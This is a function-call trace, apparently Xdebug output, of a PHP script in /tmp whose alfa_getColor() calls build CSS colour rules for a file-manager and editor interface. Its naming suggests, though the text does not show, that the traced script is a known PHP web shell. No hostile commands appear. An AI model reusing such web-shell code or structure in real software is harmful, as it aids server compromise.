5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.main_size{color: #67ABDF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_modify'
6	185	0	0.010074	437128	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'main_modify'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#67ABDF'
6	185	1	0.010098	437128
6	185	R			'#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.main_modify{color: #67ABDF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_owner_group'
6	186	0	0.010146	437384	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'main_owner_group'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#67ABDF'
6	186	1	0.010170	437384
6	186	R			'#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.main_owner_group{color: #67ABDF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_green_perm'
6	187	0	0.010217	437384	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'main_green_perm'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#25ff00'
6	187	1	0.010241	437384
6	187	R			'#25ff00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#25ff00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.main_green_perm{color: #25ff00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_red_perm'
6	188	0	0.010288	437384	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'main_red_perm'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#FF0000'
6	188	1	0.010316	437384
6	188	R			'#FF0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#FF0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.main_red_perm{color: #FF0000;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_white_perm'
6	189	0	0.010364	437384	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'main_white_perm'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#FFFFFF'
6	189	1	0.010388	437384
6	189	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.main_white_perm{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'beetween_perms'
6	190	0	0.010435	437384	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'beetween_perms'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#FFFFFF'
6	190	1	0.010460	437384
6	190	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.beetween_perms{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_actions'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.main .actions'
6	191	0	0.010518	437384	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'main_actions'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.main .actions' => 'color: {color};']]
6	191	1	0.010548	437384
6	191	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	192	0	0.010572	437384	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	192	1	0.010588	437520
6	192	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.main .actions{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'minimize_editor_background'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.minimized-wrapper'
6	193	0	0.010650	437360	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'minimize_editor_background'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0e304a', 'multi_selector' => ['.minimized-wrapper' => 'background-color: {color};']]
6	193	1	0.010682	437360
6	193	R			'#0e304a'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0e304a'
6	194	0	0.010706	437360	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0e304a'	'background-color: {color};'
6	194	1	0.010723	437512
6	194	R			'background-color: #0e304a;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #0e304a;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.minimized-wrapper{background-color: #0e304a;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'minimize_editor_text'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.minimized-text'
6	195	0	0.010796	437376	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'minimize_editor_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#f5deb3', 'multi_selector' => ['.minimized-text' => 'color: {color};']]
6	195	1	0.010828	437376
6	195	R			'#f5deb3'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#f5deb3'
6	196	0	0.010853	437376	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#f5deb3'	'color: {color};'
6	196	1	0.010868	437512
6	196	R			'color: #f5deb3;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #f5deb3;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.minimized-text{color: #f5deb3;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_border'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.editor-explorer,.editor-modal'
6	197	0	0.010935	437616	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0e304a', 'multi_selector' => ['.editor-explorer,.editor-modal' => 'border: 2px solid {color};']]
6	197	1	0.010967	437616
6	197	R			'#0e304a'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0e304a'
6	198	0	0.010991	437616	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0e304a'	'border: 2px solid {color};'
6	198	1	0.011007	437768
6	198	R			'border: 2px solid #0e304a;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border: 2px solid #0e304a;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.editor-explorer,.editor-modal{border: 2px solid #0e304a;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_background'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.editor-explorer,.editor-modal'
6	199	0	0.011071	437632	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_background'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => 'rgba(0, 1, 23, 0.94)', 'multi_selector' => ['.editor-explorer,.editor-modal' => 'background-color: {color};']]
6	199	1	0.011104	437632
6	199	R			'rgba(0, 1, 23, 0.94)'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = 'rgba(0, 1, 23, 0.94)'
6	200	0	0.011131	437632	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'rgba(0, 1, 23, 0.94)'	'background-color: {color};'
6	200	1	0.011148	437808
6	200	R			'background-color: rgba(0, 1, 23, 0.94);'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: rgba(0, 1, 23, 0.94);'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.editor-explorer,.editor-modal{background-color: rgba(0, 1, 23, 0.94);}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_header_background'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.editor-header'
6	201	0	0.011216	437656	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_header_background'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => 'rgba(21, 66, 88, 0.93)', 'multi_selector' => ['.editor-header' => 'background-color: {color};']]
6	201	1	0.011247	437656
6	201	R			'rgba(21, 66, 88, 0.93)'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = 'rgba(21, 66, 88, 0.93)'
6	202	0	0.011274	437656	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'rgba(21, 66, 88, 0.93)'	'background-color: {color};'
6	202	1	0.011291	437832
6	202	R			'background-color: rgba(21, 66, 88, 0.93);'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: rgba(21, 66, 88, 0.93);'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.editor-header{background-color: rgba(21, 66, 88, 0.93);}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_header_text'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.editor-path'
6	203	0	0.011356	437656	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_header_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#00ff7f', 'multi_selector' => ['.editor-path' => 'color: {color};']]
6	203	1	0.011387	437656
6	203	R			'#00ff7f'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#00ff7f'
6	204	0	0.011411	437656	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#00ff7f'	'color: {color};'
6	204	1	0.011437	437792
6	204	R			'color: #00ff7f;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #00ff7f;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.editor-path{color: #00ff7f;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_header_button'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.close-button, .editor-minimize'
6	205	0	0.011514	437616	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_header_button'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#1d5673', 'multi_selector' => ['.close-button, .editor-minimize' => 'background-color: {color};']]
6	205	1	0.011547	437616
6	205	R			'#1d5673'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#1d5673'
6	206	0	0.011571	437616	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#1d5673'	'background-color: {color};'
6	206	1	0.011588	437768
6	206	R			'background-color: #1d5673;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #1d5673;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.close-button, .editor-minimize{background-color: #1d5673;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_actions'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.editor_actions'
6	207	0	0.011653	437888	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_actions'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.editor_actions' => 'color: {color};']]
6	207	1	0.011684	437888
6	207	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	208	0	0.011708	437888	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	208	1	0.011724	438024
6	208	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.editor_actions{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_file_info_vars'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.editor_file_info_vars'
6	209	0	0.011786	437872	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_file_info_vars'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.editor_file_info_vars' => 'color: {color};']]
6	209	1	0.011817	437872
6	209	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	210	0	0.011842	437872	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	210	1	0.011857	438008
6	210	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.editor_file_info_vars{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_file_info_values'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.filestools'
6	211	0	0.011934	437872	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_file_info_values'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#67ABDF', 'multi_selector' => ['.filestools' => 'color: {color};']]
6	211	1	0.011965	437872
6	211	R			'#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#67ABDF'
6	212	0	0.011991	437872	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#67ABDF'	'color: {color};'
6	212	1	0.012006	438008
6	212	R			'color: #67ABDF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #67ABDF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.filestools{color: #67ABDF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_history_header'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.hheader-text,.history-clear'
6	213	0	0.012074	437872	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_history_header'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#14ff07', 'multi_selector' => ['.hheader-text,.history-clear' => 'color: {color};']]
6	213	1	0.012106	437872
6	213	R			'#14ff07'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#14ff07'
6	214	0	0.012131	437872	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#14ff07'	'color: {color};'
6	214	1	0.012146	438008
6	214	R			'color: #14ff07;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #14ff07;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.hheader-text,.history-clear{color: #14ff07;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_history_list'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.editor-file-name'
6	215	0	0.012209	437872	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_history_list'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#03b3a3', 'multi_selector' => ['.editor-file-name' => 'color: {color};']]
6	215	1	0.012240	437872
6	215	R			'#03b3a3'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#03b3a3'
6	216	0	0.012264	437872	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#03b3a3'	'color: {color};'
6	216	1	0.012280	438008
6	216	R			'color: #03b3a3;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #03b3a3;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.editor-file-name{color: #03b3a3;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_history_selected_file'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.is_active'
6	217	0	0.012350	437872	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_history_selected_file'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => 'rgba(49, 55, 93, 0.77)', 'multi_selector' => ['.is_active' => 'background-color: {color};']]
6	217	1	0.012384	437872
6	217	R			'rgba(49, 55, 93, 0.77)'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = 'rgba(49, 55, 93, 0.77)'
6	218	0	0.012412	437872	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'rgba(49, 55, 93, 0.77)'	'background-color: {color};'
6	218	1	0.012429	438048
6	218	R			'background-color: rgba(49, 55, 93, 0.77);'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: rgba(49, 55, 93, 0.77);'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.is_active{background-color: rgba(49, 55, 93, 0.77);}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'editor_history_file:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.file-holder > .history:hover'
6	219	0	0.012498	438424	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'editor_history_file:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#646464', 'multi_selector' => ['.file-holder > .history:hover' => 'background-color: {color};']]
6	219	1	0.012530	438424
6	219	R			'#646464'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#646464'
6	220	0	0.012555	438424	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#646464'	'background-color: {color};'
6	220	1	0.012572	438576
6	220	R			'background-color: #646464;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #646464;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.file-holder > .history:hover{background-color: #646464;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'input_box_border'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'input[type=text],textarea'
6	221	0	0.012642	438400	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'input_box_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['input[type=text],textarea' => 'border: 1px solid {color}']]
6	221	1	0.012675	438400
6	221	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	222	0	0.012700	438400	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'border: 1px solid {color}'
6	222	1	0.012716	438552
6	222	R			'border: 1px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border: 1px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'input[type=text],textarea{border: 1px solid #0E304A}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'input_box_text'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'input[type=text],textarea'
6	223	0	0.012781	438400	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'input_box_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#999999', 'multi_selector' => ['input[type=text],textarea' => 'color: {color};']]
6	223	1	0.012812	438400
6	223	R			'#999999'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#999999'
6	224	0	0.012837	438400	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#999999'	'color: {color};'
6	224	1	0.012852	438536
6	224	R			'color: #999999;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #999999;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'input[type=text],textarea{color: #999999;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'input_box:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'input[type=text]:hover,textarea:hover'
6	225	0	0.012916	438384	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'input_box:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#27979B', 'multi_selector' => ['input[type=text]:hover,textarea:hover' => 'box-shadow:0 0 4px {color};border:1px solid {color};']]
6	225	1	0.012948	438384
6	225	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#27979B'
6	226	0	0.012973	438384	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#27979B'	'box-shadow:0 0 4px {color};border:1px solid {color};'
6	226	1	0.012990	438560
6	226	R			'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'input[type=text]:hover,textarea:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'select_box_border'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'select'
6	227	0	0.013060	438424	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'select_box_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['select' => 'border: 1px solid {color}']]
6	227	1	0.013091	438424
6	227	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	228	0	0.013116	438424	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'border: 1px solid {color}'
6	228	1	0.013132	438576
6	228	R			'border: 1px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border: 1px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'select{border: 1px solid #0E304A}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'select_box_text'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'select'
6	229	0	0.013198	438400	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'select_box_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFEE', 'multi_selector' => ['select' => 'color: {color};']]
6	229	1	0.013228	438400
6	229	R			'#FFFFEE'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFEE'
6	230	0	0.013253	438400	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFEE'	'color: {color};'
6	230	1	0.013269	438536
6	230	R			'color: #FFFFEE;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFEE;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'select{color: #FFFFEE;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'select_box:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'select:hover'
6	231	0	0.013330	438384	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'select_box:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#27979B', 'multi_selector' => ['select:hover' => 'box-shadow:0 0 4px {color};border:1px solid {color};']]
6	231	1	0.013363	438384
6	231	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#27979B'
6	232	0	0.013387	438384	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#27979B'	'box-shadow:0 0 4px {color};border:1px solid {color};'
6	232	1	0.013404	438560
6	232	R			'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'box-shadow:0 0 4px #27979B;border:1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'select:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'button_border'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'input[type=submit],.button,#addup'
6	233	0	0.013473	438424	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'button_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#27979B', 'multi_selector' => ['input[type=submit],.button,#addup' => 'border: 1px solid {color};']]
6	233	1	0.013505	438424
6	233	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#27979B'
6	234	0	0.013529	438424	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#27979B'	'border: 1px solid {color};'
6	234	1	0.013545	438576
6	234	R			'border: 1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border: 1px solid #27979B;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= 'input[type=submit],.button,#addup{border: 1px solid #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'button:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = 'input[type=submit]:hover'
6	235	0	0.013611	438400	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'button:hover'
